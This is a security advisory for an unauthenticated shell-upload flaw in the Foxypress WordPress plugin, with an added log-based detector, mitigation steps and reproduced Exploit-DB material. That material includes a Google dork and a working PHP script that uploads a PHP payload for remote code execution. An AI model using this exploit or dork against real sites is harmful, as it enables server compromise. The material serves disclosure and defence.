Vendor: WordPress
By: Sammy FORGIT
CVSS: 7.5 (HIGH)
Type: Shell Upload
CWE: 434 (Unrestricted Upload of File with Dangerous Type)
Product: Foxypress plugin for WordPress
Affected versions: 0.4.1.1 through 0.4.2.1 (plugin versions)
Patch exists: No
Year: 2012

WordPress Plugins – Foxypress Shell Upload Vulnerability

Foxypress bundles the Uploadify file-upload component, and its server-side handler (wp-content/plugins/foxypress/uploadify/uploadify.php) accepts a multipart POST from anyone: the request needs no WordPress login, nonce or capability check, and the handler does not validate the type of the submitted file (CWE-434). An attacker can therefore send a PHP file in the Filedata field with a single cURL request, which is exactly what the PostShell.php script below does with lo.php. The handler's response reveals where the file was stored, and requesting that path executes the uploaded PHP with the web server's privileges, giving remote code execution on the host.
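As a detection aid for this exploit pattern, here is an added example that is not part of the original advisory or the plugin's code: a Python scan over Apache-style combined access logs that flags POSTs to the Foxypress uploadify.php handler and any later request from the same client for a PHP file under wp-content. The log lines are constructed for the example, and the location of lo.php in them is an assumption; the detector does not depend on where the handler stores uploads.

```python
import re
from datetime import datetime

# Apache/nginx "combined" format:
# ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The unauthenticated upload handler shipped with Foxypress.
UPLOADIFY = "/wp-content/plugins/foxypress/uploadify/uploadify.php"
# Extensions the web server is likely to hand to the PHP interpreter.
PHP_SUFFIXES = (".php", ".php5", ".phtml", ".phar")

# Constructed sample log lines (not real traffic). 203.0.113.7 POSTs a file to
# the handler and then requests it; the lo.php path is an assumed location.
SAMPLE_LOG = """\
198.51.100.20 - - [26/May/2012:10:00:01 +0200] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:03:10 +0200] "GET /wordpress/wp-content/plugins/foxypress/readme.txt HTTP/1.1" 200 1843 "-" "curl/7.22.0"
203.0.113.7 - - [26/May/2012:10:03:15 +0200] "POST /wordpress/wp-content/plugins/foxypress/uploadify/uploadify.php HTTP/1.1" 200 58 "-" "curl/7.22.0"
203.0.113.7 - - [26/May/2012:10:03:17 +0200] "GET /wordpress/wp-content/plugins/foxypress/uploadify/lo.php HTTP/1.1" 200 49211 "-" "curl/7.22.0"
198.51.100.20 - - [26/May/2012:10:05:00 +0200] "GET /wordpress/wp-content/plugins/foxypress/css/style.css HTTP/1.1" 200 912 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def detect(log_text, max_gap_seconds=3600):
    """Return (kind, ip, path, status) findings for the Foxypress upload pattern.

    'upload_attempt'   : any POST to uploadify.php (the handler should never be
                         reached by unauthenticated clients, so every hit is
                         worth reviewing).
    'webshell_request' : a GET, from an IP that POSTed to the handler within
                         max_gap_seconds, for a PHP-executable path under
                         /wp-content/ (the uploaded file being invoked).
    """
    findings = []
    last_upload = {}  # ip -> time of the most recent POST to the handler
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path.endswith(UPLOADIFY):
            last_upload[ip] = rec["time"]
            findings.append(("upload_attempt", ip, path, rec["status"]))
            continue
        if (rec["method"] == "GET" and ip in last_upload
                and "/wp-content/" in path
                and path.lower().endswith(PHP_SUFFIXES)
                and (rec["time"] - last_upload[ip]).total_seconds() <= max_gap_seconds):
            findings.append(("webshell_request", ip, path, rec["status"]))
    return findings


if __name__ == "__main__":
    for kind, ip, path, status in detect(SAMPLE_LOG):
        print(f"{kind:17} {ip:15} {status} {path}")
```

A POST to the handler is the stronger signal: the plugin's admin pages are the only legitimate caller, so a POST from an address that never logged in (or one that appears in no wp-login.php record) is almost certainly this exploit. The follow-up GET check limits false positives from plugins that legitimately serve PHP files under wp-content.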

Mitigation:

The page records no patched release, so the reliable fix is to remove the Foxypress plugin, or at least delete its uploadify/ directory so the handler can no longer be reached. If the plugin must stay for the moment, deny web access to uploadify.php at the web server and disable PHP execution in every directory that receives uploads. Then look for files that have already been dropped: any unexpected .php file under wp-content/plugins/foxypress/ or wp-content/uploads/ should be treated as a web shell and the site as compromised. More generally, keep all WordPress plugins and themes updated and install them only from trusted sources.

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Foxypress Shell Upload Vulnerability
# Version : 0.4.1.1 - 0.4.2.1
# Link : http://wordpress.org/extend/plugins/foxypress/
# Plugins : http://downloads.wordpress.org/plugin/foxypress.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/foxypress/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php
// PostShell.php: uploads lo.php to the unauthenticated Uploadify handler
// shipped with Foxypress. Replace www.exemple.com with the target host.

$uploadfile = "lo.php";
$target = "http://www.exemple.com/wordpress/wp-content/plugins/foxypress/uploadify/uploadify.php";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// Uploadify reads the file from the multipart field named "Filedata".
// The original "@$uploadfile" shorthand was removed in PHP 7; CURLFile
// produces the same multipart upload on PHP 5.5 and later.
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// The response body reveals where the file was stored on the target.
print "$postResult";

?>

Shell Access : the response body printed as $postResult contains the path the handler assigned to the uploaded file; request that URL to execute lo.php.

lo.php
<?php
// Proof-of-concept payload: phpinfo() confirms code execution. Any PHP
// placed here runs with the web server's privileges once lo.php is requested.
phpinfo();
?>